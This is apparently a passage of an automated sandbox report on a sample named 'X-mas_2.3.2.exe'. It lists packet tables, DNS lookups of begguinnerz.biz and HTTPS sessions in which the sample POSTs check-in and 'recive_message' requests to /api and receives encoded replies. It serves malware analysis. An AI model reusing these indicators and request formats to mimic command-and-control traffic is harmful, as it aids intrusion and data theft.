Dec 30, 2024 21:20:21.278543949 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.721918106 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.721985102 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722034931 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722090006 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722131968 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722151041 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.722182035 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722206116 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.722220898 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.722225904 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722599030 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722635031 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722649097 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.722656012 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.722713947 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.722878933 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.726579905 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.726661921 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.726670980 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.781301022 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.808429956 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.808511972 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.808624983 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.808713913 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.808736086 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.809134007 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.809149027 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:21.809165955 CET	49741	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:21.809170961 CET	443	49741	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:22.011248112 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.011281013 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:22.011359930 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.011629105 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.011641979 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:22.469285011 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:22.469398975 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.470818996 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.470825911 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:22.471146107 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:22.472206116 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.472337008 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:22.472372055 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.012799978 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.012916088 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.013026953 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.013433933 CET	49752	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.013448954 CET	443	49752	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.110692978 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.110744953 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.110827923 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.111085892 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.111099958 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.595824957 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.596081972 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.597349882 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.597381115 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.597778082 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.598901987 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.599087000 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.599138975 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:23.599201918 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:23.643342018 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.089015961 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.089154959 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.089346886 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.089489937 CET	49758	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.089534998 CET	443	49758	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.335469961 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.335525036 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.335594893 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.336047888 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.336064100 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.806284904 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.806372881 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.807418108 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.807426929 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.807745934 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.812685966 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.812834024 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.812868118 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:24.812932014 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:24.812937021 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:25.297084093 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:25.297205925 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:25.297307968 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:25.297465086 CET	49768	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:25.297482014 CET	443	49768	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:25.896657944 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:25.896703959 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:25.896780968 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:25.897166967 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:25.897180080 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:26.381072998 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:26.381233931 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:26.382385969 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:26.382391930 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:26.382626057 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:26.383642912 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:26.383760929 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:26.383765936 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.220644951 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.220741987 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.220988035 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.221265078 CET	49779	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.221282959 CET	443	49779	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.290014982 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.290045023 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.290147066 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.290433884 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.290447950 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.757778883 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.757863045 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.758861065 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.758869886 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.759102106 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:27.760123014 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.760201931 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:27.760206938 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:28.292216063 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:28.292321920 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:28.292470932 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:28.292536974 CET	54613	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:28.292551994 CET	443	54613	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:28.350008965 CET	54620	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:28.350056887 CET	443	54620	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:28.350133896 CET	54620	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:28.350414038 CET	54620	443	192.168.2.5	172.67.190.223
Dec 30, 2024 21:20:28.350429058 CET	443	54620	172.67.190.223	192.168.2.5
Dec 30, 2024 21:20:28.593893051 CET	54620	443	192.168.2.5	172.67.190.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 21:19:56.633394003 CET	60111	53	192.168.2.5	1.1.1.1
Dec 30, 2024 21:19:56.646981955 CET	53	60111	1.1.1.1	192.168.2.5
Dec 30, 2024 21:20:27.178903103 CET	53	55649	162.159.36.2	192.168.2.5
Dec 30, 2024 21:20:27.646020889 CET	51879	53	192.168.2.5	1.1.1.1
Dec 30, 2024 21:20:27.655484915 CET	53	51879	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 21:19:56.633394003 CET	192.168.2.5	1.1.1.1	0xa315	Standard query (0)	begguinnerz.biz	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:20:27.646020889 CET	192.168.2.5	1.1.1.1	0x922e	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 21:19:56.646981955 CET	1.1.1.1	192.168.2.5	0xa315	No error (0)	begguinnerz.biz		172.67.190.223	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:19:56.646981955 CET	1.1.1.1	192.168.2.5	0xa315	No error (0)	begguinnerz.biz		104.21.92.91	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:20:27.655484915 CET	1.1.1.1	192.168.2.5	0x922e	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

begguinnerz.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:19:57 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: begguinnerz.biz
2024-12-30 20:19:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-30 20:20:20 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7bqt9g7ln6m1bbhcskqp14sjai; expires=Fri, 25 Apr 2025 14:06:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HiI02xaYJH2LTB74UTqcgHvw2puq%2FDKxN44uztvTRaEjijFyhunl75PXF0Pm8Gq%2BIJL7ZKp4eiK1ZzYTT%2BuBRqHAEQeEq6YpiPLAiFKNJh8mvrhxdOYbBsUam%2BhCfNUaZc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4ba4b2e197c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1839&rtt_var=691&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=906&delivery_rate=1587819&cwnd=218&unsent_bytes=0&cid=c223c4fa6b804c6b&ts=23361&x=0"
2024-12-30 20:20:20 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-30 20:20:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49741	172.67.190.223	443	3140	C:\Users\user\Desktop\X-mas_2.3.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:20:21 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: begguinnerz.biz
2024-12-30 20:20:21 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--aadb880da83d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-30 20:20:21 UTC	1123	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:20:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vkqfsu2vk2gan82vf81apiil6s; expires=Fri, 25 Apr 2025 14:07:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t52vl3FVY0RrAdwhdPvODApHoK3ITEbsh7sFw9O7J4ZYsMLxHkhKQda4ulH14pN%2B4ZTZ1GggdZW4NsinMT5QuN6aFdxMzWgPrgxZNUAqJOYstUsSdjJzfsZCzjcfVs4L%2FKM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4bae189bb7c88-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=61001&min_rtt=52411&rtt_var=25790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=985&delivery_rate=55713&cwnd=219&unsent_bytes=0&cid=cf9ae6b3073ae18d&ts=512&x=0"
2024-12-30 20:20:21 UTC	246	IN	Data Raw: 31 64 30 32 0d 0a 55 72 2b 6d 51 68 6e 49 4b 70 68 4b 67 31 33 61 34 58 58 75 70 4d 6e 4f 35 72 61 6e 46 7a 6f 2b 78 4c 4e 30 58 69 69 4c 65 32 4d 70 6e 64 42 67 49 2f 77 47 75 6a 6e 6d 66 2b 43 48 46 49 4c 58 72 4f 4c 45 31 38 4d 31 41 46 69 6c 33 77 63 37 42 4b 6b 4e 44 6e 43 46 77 43 4e 31 75 30 2b 30 61 4f 59 6c 2b 4e 73 75 6c 59 61 73 6f 4d 53 4d 68 58 4a 51 58 4b 58 66 46 6a 39 44 35 41 73 50 4d 64 66 4b 4a 58 47 74 53 66 77 72 37 7a 43 2f 68 42 43 50 7a 71 65 6e 69 39 37 4b 4e 52 59 63 6f 63 6c 57 5a 41 72 47 48 68 63 7a 38 73 63 78 63 75 70 58 74 44 47 68 4f 4c 54 44 54 38 7a 46 72 4b 79 4b 30 4d 4e 38 55 6c 61 73 31 78 63 36 51 76 73 53 42 54 72 58 78 43 5a 77 70 30 44 6f 4a 75 55 33 74 49 49 61 6a 34 62 6c 37 49 50 4d Data Ascii: 1d02Ur+mQhnIKphKg13a4XXupMnO5ranFzo+xLN0XiiLe2MpndBgI/wGujnmf+CHFILXrOLE18M1AFil3wc7BKkNDnCFwCN1u0+0aOYl+NsulYasoMSMhXJQXKXfFj9D5AsPMdfKJXGtSfwr7zC/hBCPzqeni97KNRYcoclWZArGHhcz8scxcupXtDGhOLTDT8zFrKyK0MN8Ulas1xc6QvsSBTrXxCZwp0DoJuU3tIIaj4bl7IPM
2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 68 53 30 59 44 35 54 53 42 79 31 66 35 41 6b 48 63 4d 4b 4b 4f 54 75 74 52 4c 70 77 6f 54 65 30 6a 52 4b 50 79 61 79 74 68 4d 62 4b 64 56 74 55 72 74 55 63 4d 30 58 6d 46 77 73 33 31 63 30 6e 64 4b 31 41 2f 43 66 69 66 2f 62 44 45 4a 53 47 38 2b 79 6b 78 4d 5a 32 54 46 47 33 6b 51 6c 79 55 36 6b 65 44 58 43 46 68 43 5a 31 71 30 58 36 4f 75 6b 30 73 34 59 46 68 38 2b 6d 6f 59 54 5a 7a 33 70 62 58 4b 48 62 48 44 4e 41 37 52 51 4d 4e 74 33 45 59 44 58 71 54 2b 4a 6f 75 58 2b 62 68 67 65 4c 79 72 33 75 76 70 54 61 4f 30 45 63 6f 64 31 57 5a 41 72 68 48 41 49 7a 31 73 73 6a 63 36 46 61 2b 6a 72 6e 4d 72 32 52 45 59 6e 49 6f 61 2b 57 33 73 74 7a 57 31 57 74 32 42 4d 37 54 71 6c 58 51 54 66 46 68 48 67 37 69 30 58 78 4a 4f 73 6f 75 4d 4d 49 77 74 2f 72 71 34 69 Data Ascii: hS0YD5TSBy1f5AkHcMKKOTutRLpwoTe0jRKPyaythMbKdVtUrtUcM0XmFws31c0ndK1A/Cfif/bDEJSG8+ykxMZ2TFG3kQlyU6keDXCFhCZ1q0X6Ouk0s4YFh8+moYTZz3pbXKHbHDNA7RQMNt3EYDXqT+JouX+bhgeLyr3uvpTaO0Ecod1WZArhHAIz1ssjc6Fa+jrnMr2REYnIoa+W3stzW1Wt2BM7TqlXQTfFhHg7i0XxJOsouMMIwt/rq4i
2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 56 61 73 6b 56 68 38 54 66 46 5a 57 58 44 73 30 79 73 35 6e 30 76 30 4a 75 59 70 2b 4a 78 5a 6c 59 61 73 6f 4d 53 4d 68 58 68 51 57 61 50 65 46 7a 5a 45 37 42 4d 4e 4f 4e 50 48 4d 6e 53 75 53 50 59 67 36 7a 4b 32 68 78 2b 46 7a 61 43 71 68 4e 58 50 4e 52 59 63 6f 63 6c 57 5a 41 72 64 48 67 30 39 30 6f 59 56 65 4b 52 47 2f 54 36 68 49 50 61 61 56 34 76 4b 36 2f 54 45 32 4d 78 31 55 31 61 69 30 52 45 78 54 2b 6f 65 41 6a 33 61 7a 69 35 38 72 6b 54 7a 4a 65 63 2f 76 34 63 53 6e 73 4f 69 6f 49 69 55 69 7a 56 66 52 4f 61 4a 56 68 4e 4e 2f 78 6f 75 4d 38 7a 4e 59 47 54 6b 55 62 6f 76 37 58 2f 67 77 78 43 4a 7a 71 43 71 6a 4e 54 58 63 46 5a 58 70 39 73 51 50 55 66 6c 48 77 45 78 33 63 49 73 65 36 31 50 36 44 72 6b 4f 61 71 4a 56 38 4b 47 72 4c 54 45 6a 49 56 44 Data Ascii: VaskVh8TfFZWXDs0ys5n0v0JuYp+JxZlYasoMSMhXhQWaPeFzZE7BMNONPHMnSuSPYg6zK2hx+FzaCqhNXPNRYcoclWZArdHg090oYVeKRG/T6hIPaaV4vK6/TE2Mx1U1ai0RExT+oeAj3azi58rkTzJec/v4cSnsOioIiUizVfROaJVhNN/xouM8zNYGTkUbov7X/gwxCJzqCqjNTXcFZXp9sQPUflHwEx3cIse61P6DrkOaqJV8KGrLTEjIVD
2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 45 56 4d 30 50 6d 45 51 6b 2f 30 73 41 75 66 61 78 46 2f 79 66 72 4c 62 43 4e 47 6f 66 4a 6f 4c 36 45 32 63 46 35 58 46 53 74 32 31 5a 79 43 75 34 42 51 57 69 64 38 53 31 30 71 6b 76 73 61 50 35 78 6f 63 4d 51 67 49 62 7a 37 49 6a 61 78 58 70 55 55 4b 33 5a 46 7a 42 45 37 68 77 49 4f 4e 58 57 49 58 2b 69 53 66 51 6e 34 44 75 39 68 68 4f 4c 77 71 32 6a 78 4a 71 46 63 6b 41 63 2f 70 45 35 47 33 2b 72 4f 44 74 77 77 6f 6f 35 4f 36 31 45 75 6e 43 68 4d 37 75 50 48 34 50 41 6f 71 43 4f 33 63 35 35 55 31 69 71 32 42 4d 36 53 2b 77 63 41 44 54 52 7a 69 5a 34 71 55 66 31 4a 2b 6c 2f 39 73 4d 51 6c 49 62 7a 37 4b 48 44 7a 6e 74 65 48 4c 6d 66 44 33 78 4e 35 56 6c 5a 63 4e 48 4e 4a 6e 32 76 52 50 73 75 36 54 71 77 68 78 61 4b 77 4b 69 6a 67 4e 48 45 65 6c 78 51 71 Data Ascii: EVM0PmEQk/0sAufaxF/yfrLbCNGofJoL6E2cF5XFSt21ZyCu4BQWid8S10qkvsaP5xocMQgIbz7IjaxXpUUK3ZFzBE7hwIONXWIX+iSfQn4Du9hhOLwq2jxJqFckAc/pE5G3+rODtwwoo5O61EunChM7uPH4PAoqCO3c55U1iq2BM6S+wcADTRziZ4qUf1J+l/9sMQlIbz7KHDznteHLmfD3xN5VlZcNHNJn2vRPsu6TqwhxaKwKijgNHEelxQq
2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 4c 35 42 49 54 4e 39 4c 41 4a 33 65 73 52 2f 77 70 35 44 57 30 68 42 4b 48 79 61 66 73 79 70 54 43 62 52 67 45 35 76 38 64 4c 31 33 71 46 77 6f 6d 78 6f 51 2f 4e 62 4d 49 2f 53 53 68 5a 2f 69 41 48 49 66 43 71 36 43 45 30 4d 68 31 53 6c 4f 68 31 68 38 33 57 4f 4d 65 42 6a 76 56 7a 79 39 39 75 45 54 30 4f 75 51 74 71 73 4e 5a 7a 4d 47 7a 37 4e 79 55 38 33 4a 49 54 4b 57 54 4a 79 70 4a 2f 78 49 4d 50 4a 33 62 62 6d 4c 71 54 2f 5a 6f 75 58 2b 2b 6a 42 36 50 79 61 71 6c 69 4e 6e 41 66 46 31 64 6f 4e 55 63 4e 6b 72 76 48 77 41 31 31 38 63 68 63 61 4e 50 38 69 2f 69 4c 66 6a 4e 56 34 76 65 36 2f 54 45 2f 63 4a 6e 56 6b 7a 6d 7a 6c 67 6c 43 75 34 56 51 57 69 64 77 43 70 30 72 6b 2f 32 4c 75 51 35 74 59 49 59 6a 63 61 6b 71 49 2f 64 77 33 52 56 57 61 76 56 42 44 Data Ascii: L5BITN9LAJ3esR/wp5DW0hBKHyafsypTCbRgE5v8dL13qFwomxoQ/NbMI/SShZ/iAHIfCq6CE0Mh1SlOh1h83WOMeBjvVzy99uET0OuQtqsNZzMGz7NyU83JITKWTJypJ/xIMPJ3bbmLqT/ZouX++jB6PyaqliNnAfF1doNUcNkrvHwA118chcaNP8i/iLfjNV4ve6/TE/cJnVkzmzlglCu4VQWidwCp0rk/2LuQ5tYIYjcakqI/dw3RVWavVBD
2024-12-30 20:20:21 UTC	1369	IN	Data Raw: 57 58 44 64 7a 69 56 78 70 30 76 31 4b 2f 4d 2b 76 70 45 58 67 63 79 35 70 6f 2f 52 79 48 68 56 58 36 44 58 48 54 42 59 34 42 6b 43 4f 35 32 4b 59 48 79 79 43 4b 4a 6f 77 69 69 75 69 52 43 41 30 4b 43 74 68 38 4c 49 5a 52 67 53 35 73 41 52 4c 51 71 78 44 78 45 6e 32 74 74 75 59 75 70 50 39 6d 69 35 66 37 36 4b 45 59 76 41 70 62 36 42 30 73 70 36 55 56 57 69 32 52 55 38 54 75 30 65 42 44 50 52 7a 79 64 34 70 55 7a 7a 4a 75 67 77 2b 4d 31 58 69 39 37 72 39 4d 54 31 33 6e 5a 55 55 65 62 4f 57 43 55 4b 37 68 56 42 61 4a 33 49 4c 6e 36 71 51 76 77 73 35 44 6d 79 68 68 65 48 78 61 53 6f 67 74 44 4b 64 56 4e 56 70 39 63 54 4e 6b 48 76 46 41 49 32 32 34 52 75 4f 36 31 51 75 6e 43 68 48 36 4f 4f 47 34 75 47 74 4f 4b 64 6c 4d 4a 35 47 41 54 6d 32 68 6f 34 54 65 6b Data Ascii: WXDdziVxp0v1K/M+vpEXgcy5po/RyHhVX6DXHTBY4BkCO52KYHyyCKJowiiuiRCA0KCth8LIZRgS5sARLQqxDxEn2ttuYupP9mi5f76KEYvApb6B0sp6UVWi2RU8Tu0eBDPRzyd4pUzzJugw+M1Xi97r9MT13nZUUebOWCUK7hVBaJ3ILn6qQvws5DmyhheHxaSogtDKdVNVp9cTNkHvFAI224RuO61QunChH6OOG4uGtOKdlMJ5GATm2ho4Tek
2024-12-30 20:20:21 UTC	343	IN	Data Raw: 63 30 6e 59 4c 74 65 39 7a 6a 6d 66 34 66 4e 56 35 53 47 38 2b 79 78 31 38 74 37 58 30 71 33 6e 44 45 71 51 4f 34 4a 42 69 66 53 68 47 34 37 72 41 69 69 65 36 39 2f 76 4a 4a 58 31 4a 62 35 39 39 47 48 6b 69 55 4b 51 2b 6a 49 56 69 6f 4b 73 55 74 50 63 4d 2b 45 65 44 76 74 53 2b 67 36 35 7a 79 75 67 46 43 79 2b 49 79 32 69 64 4c 53 5a 47 5a 69 6f 63 73 62 4f 6c 33 34 56 52 51 7a 30 38 6f 6e 62 65 6f 47 75 69 65 68 5a 34 48 44 58 38 7a 35 35 65 79 63 6c 4a 30 31 62 56 2b 6f 33 78 45 71 57 36 51 2b 47 7a 33 62 30 7a 45 37 35 41 6a 38 61 4c 6c 76 39 73 4d 54 6e 59 62 7a 2f 4e 61 50 6b 43 59 50 44 50 54 4f 57 43 55 4b 2f 31 6c 5a 59 70 4f 45 4d 6a 76 79 43 4c 30 72 38 79 32 2b 67 41 47 50 67 5a 57 53 71 74 50 44 63 46 39 4d 35 50 38 64 4b 45 32 70 56 30 45 2f Data Ascii: c0nYLte9zjmf4fNV5SG8+yx18t7X0q3nDEqQO4JBifShG47rAiie69/vJJX1Jb599GHkiUKQ+jIVioKsUtPcM+EeDvtS+g65zyugFCy+Iy2idLSZGZiocsbOl34VRQz08onbeoGuiehZ4HDX8z55eyclJ01bV+o3xEqW6Q+Gz3b0zE75Aj8aLlv9sMTnYbz/NaPkCYPDPTOWCUK/1lZYpOEMjvyCL0r8y2+gAGPgZWSqtPDcF9M5P8dKE2pV0E/
